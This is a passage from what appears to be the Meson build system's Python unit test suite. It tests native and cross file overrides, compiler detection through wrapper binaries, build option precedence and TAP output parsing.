print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
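            # Writing to a fifo blocks until a reader opens it, so the native
            # file content is written from a background thread while meson
            # reads it from the main one.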
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary, entry=None):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
            raise unittest.SkipTest('No llvm-config installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
elif is_osx():
binary = 'python'
else:
binary = 'python2'
        # We may not have python2, so check for it
for v in ['2', '2.7', '-2.7']:
rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc == 0:
break
else:
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', binary, entry='python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
                    # but we don't support that ATM so let's not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang, binary, version_str, version):
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = wrapper
compiler = getter()
self.assertEqual(compiler.version, version)
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = wrapper
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
def test_user_options(self):
testcase = os.path.join(self.common_test_dir, '43 options')
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0)]:
config = self.helper_create_native_file({'project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_user_options_command_line_overrides(self):
testcase = os.path.join(self.common_test_dir, '43 options')
config = self.helper_create_native_file({'project options': {'other_one': True}})
self.init(testcase, extra_args=['--native-file', config, '-Dother_one=false'])
def test_user_options_subproject(self):
testcase = os.path.join(self.unit_test_dir, '79 user options for subproject')
s = os.path.join(testcase, 'subprojects')
if not os.path.exists(s):
os.mkdir(s)
s = os.path.join(s, 'sub')
if not os.path.exists(s):
sub = os.path.join(self.common_test_dir, '43 options')
shutil.copytree(sub, s)
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0)]:
config = self.helper_create_native_file({'sub:project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_option_bool(self):
# Bools are allowed to be unquoted
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({'built-in options': {'werror': True}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
            # Test that the werror value from the native file is used
if 'werror' in each['name']:
self.assertEqual(each['value'], True)
break
else:
self.fail('Did not find werror in build options?')
def test_option_integer(self):
        # Integers are allowed to be unquoted
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({'built-in options': {'unity_size': 100}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
            # Test that the unity_size value from the native file is used
if 'unity_size' in each['name']:
self.assertEqual(each['value'], 100)
break
else:
self.fail('Did not find unity_size in build options?')
def test_builtin_options(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
            self.fail('Did not find cpp_std in build options?')
def test_builtin_options_env_overrides_conf(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'pkg_config_path': '/foo'}})
self.init(testcase, extra_args=['--native-file', config], override_envvars={'PKG_CONFIG_PATH': '/bar'})
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/bar'])
break
else:
self.fail('Did not find pkg_config_path in build options?')
def test_builtin_options_subprojects(self):
testcase = os.path.join(self.common_test_dir, '102 subproject subdir')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both', 'c_args': ['-Dfoo']}, 'sub:built-in options': {'default_library': 'static'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
            # Test that non-per-subproject options are inherited from the parent
if 'c_args' in each['name']:
                # This path will be hit twice, once for build and once for host.
self.assertEqual(each['value'], ['-Dfoo'])
found += 1
elif each['name'] == 'default_library':
self.assertEqual(each['value'], 'both')
found += 1
elif each['name'] == 'sub:default_library':
self.assertEqual(each['value'], 'static')
found += 1
        self.assertEqual(found, 4, 'Did not find all four expected options')
def test_builtin_options_subprojects_overrides_buildfiles(self):
# If the buildfile says subproject(... default_library: shared), ensure that's overwritten
testcase = os.path.join(self.common_test_dir, '230 persubproject options')
config = self.helper_create_native_file({'sub2:built-in options': {'default_library': 'shared'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
        self.assertIn('Parent should override default_library', cm.exception.stdout)
def test_builtin_options_subprojects_inherits_parent_override(self):
# If the buildfile says subproject(... default_library: shared), ensure that's overwritten
testcase = os.path.join(self.common_test_dir, '230 persubproject options')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
        self.assertIn('Parent should override default_library', cm.exception.stdout)
def test_builtin_options_compiler_properties(self):
# the properties section can have lang_args, and those need to be
# overwritten by the built-in options
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'c_args': ['-DFOO']},
'properties': {'c_args': ['-DBAR']},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'c_args':
self.assertEqual(each['value'], ['-DFOO'])
break
else:
self.fail('Did not find c_args in build options?')
def test_builtin_options_compiler_properties_legacy(self):
# The legacy placement in properties is still valid if a 'built-in
# options' setting is present, but doesn't have the lang_args
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'properties': {'c_args': ['-DBAR']},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'c_args':
self.assertEqual(each['value'], ['-DBAR'])
break
else:
self.fail('Did not find c_args in build options?')
def test_builtin_options_paths(self):
# the properties section can have lang_args, and those need to be
# overwritten by the built-in options
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'bindir': 'foo'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'foo')
break
else:
self.fail('Did not find bindir in build options?')
def test_builtin_options_paths_legacy(self):
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'bar')
break
else:
self.fail('Did not find bindir in build options?')
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functionality not directly related to
cross compiling.
This is mainly aimed to testing overrides from cross files.
"""
def setUp(self):
super().setUp()
self.current_config = 0
self.current_wrapper = 0
def _cross_file_generator(self, *, needs_exe_wrapper: bool = False,
exe_wrapper: T.Optional[T.List[str]] = None) -> str:
if is_windows():
raise unittest.SkipTest('Cannot run this test on non-mingw/non-cygwin windows')
if is_sunos():
cc = 'gcc'
else:
cc = 'cc'
return textwrap.dedent("""\
[binaries]
c = '/usr/bin/{}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
{}
[properties]
needs_exe_wrapper = {}
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""".format(cc,
'exe_wrapper = {}'.format(str(exe_wrapper)) if exe_wrapper is not None else '',
needs_exe_wrapper))
def _stub_exe_wrapper(self) -> str:
return textwrap.dedent('''\
#!/usr/bin/env python3
import subprocess
import sys
sys.exit(subprocess.run(sys.argv[1:]).returncode)
''')
def test_needs_exe_wrapper_true(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
def test_needs_exe_wrapper_false(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=False))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertNotRegex(out, r'Skipped:\s*1\n')
def test_needs_exe_wrapper_true_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
s = Path(d) / 'wrapper.py'
with s.open('wt') as f:
f.write(self._stub_exe_wrapper())
s.chmod(0o774)
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(
needs_exe_wrapper=True,
exe_wrapper=[str(s)]))
self.init(testdir, extra_args=['--cross-file=' + str(p), '-Dexpect=true'])
out = self.run_target('test')
self.assertRegex(out, r'Ok:\s*3\s*\n')
def test_cross_exe_passed_no_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
self.build()
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
# The test uses mocking and thus requires that the current process is the
# one to run the Meson steps. If we are using an external test executable
# (most commonly in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = self._cross_file_generator()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the tests, this test
# will fail, so mock the environment, pop the variable, then test.
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def helper_create_cross_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
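# Illustrative example (not part of the suite): passing
# {'binaries': {'c': '/usr/bin/cc'}} writes a generated<N>.config file
# containing:
#   [binaries]
#   c='/usr/bin/cc'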
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overriden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_user_options(self):
# This is just a touch test for cross file, since the implementation
# shares code after loading from the files
testcase = os.path.join(self.common_test_dir, '43 options')
config = self.helper_create_cross_file({'project options': {'testoption': 'some other value'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--cross-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_builtin_options(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--cross-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
self.fail('No c++ standard set?')
def test_builtin_options_per_machine(self):
"""Test options that are allowed to be set on a per-machine basis.
Such options could be passed twice, once for the build machine, and
once for the host machine. I've picked the pkg-config path, but any option
that can be set for both machines would do.
"""
testcase = os.path.join(self.common_test_dir, '2 cpp')
cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross/path', 'cpp_std': 'c++17'}})
native = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native/path', 'cpp_std': 'c++14'}})
# Ensure that PKG_CONFIG_PATH is not set in the environment
with mock.patch.dict('os.environ'):
for k in ['PKG_CONFIG_PATH', 'PKG_CONFIG_PATH_FOR_BUILD']:
try:
del os.environ[k]
except KeyError:
pass
self.init(testcase, extra_args=['--cross-file', cross, '--native-file', native])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/cross/path'])
found += 1
elif each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++17')
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/native/path'])
found += 1
elif each['name'] == 'build.cpp_std':
self.assertEqual(each['value'], 'c++14')
found += 1
if found == 4:
break
self.assertEqual(found, 4, 'Did not find all sections.')
def test_builtin_options_env_overrides_conf(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/foo'}})
cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/foo'}})
self.init(testcase, extra_args=['--native-file', config, '--cross-file', cross],
override_envvars={'PKG_CONFIG_PATH': '/bar', 'PKG_CONFIG_PATH_FOR_BUILD': '/dir'})
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/bar'])
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/dir'])
found += 1
if found == 2:
break
self.assertEqual(found, 2, 'Did not find all sections.')
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser(io.StringIO(s))
return iter(parser.parse())
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, count=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, count=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, count=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
events = self.parse_tap('ok 1 abc')
self.assert_test(events, number=1, name='abc', result=TestResult.OK)
self.assert_last(events)
def test_one_test_not_ok(self):
events = self.parse_tap('not ok')
self.assert_test(events, number=1, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_one_test_todo(self):
events = self.parse_tap('not ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.EXPECTEDFAIL)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # TODO')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_one_test_skip(self):
events = self.parse_tap('ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
def test_one_test_skip_failure(self):
events = self.parse_tap('not ok 1 abc # SKIP')
self.assert_test(events, number=1, name='abc', result=TestResult.FAIL)
self.assert_last(events)
def test_many_early_plan(self):
events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
self.assert_plan(events, count=4, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_last(events)
def test_many_late_plan(self):
events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_test(events, number=3, name='', result=TestResult.OK)
self.assert_test(events, number=4, name='', result=TestResult.FAIL)
self.assert_plan(events, count=4, late=True)
self.assert_last(events)
def test_directive_case(self):
events = self.parse_tap('ok 1 abc # skip')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
self.assert_last(events)
def test_directive_explanation(self):
events = self.parse_tap('ok 1 abc # skip why')
self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
explanation='why')
self.assert_last(events)
events = self.parse_tap('ok 1 abc # ToDo Because')
self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
explanation='Because')
self.assert_last(events)
def test_one_test_early_plan(self):
events = self.parse_tap('1..1\nok')
self.assert_plan(events, count=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_late_plan(self):
events = self.parse_tap('ok\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=1, late=True)
self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, count=2, late=True)
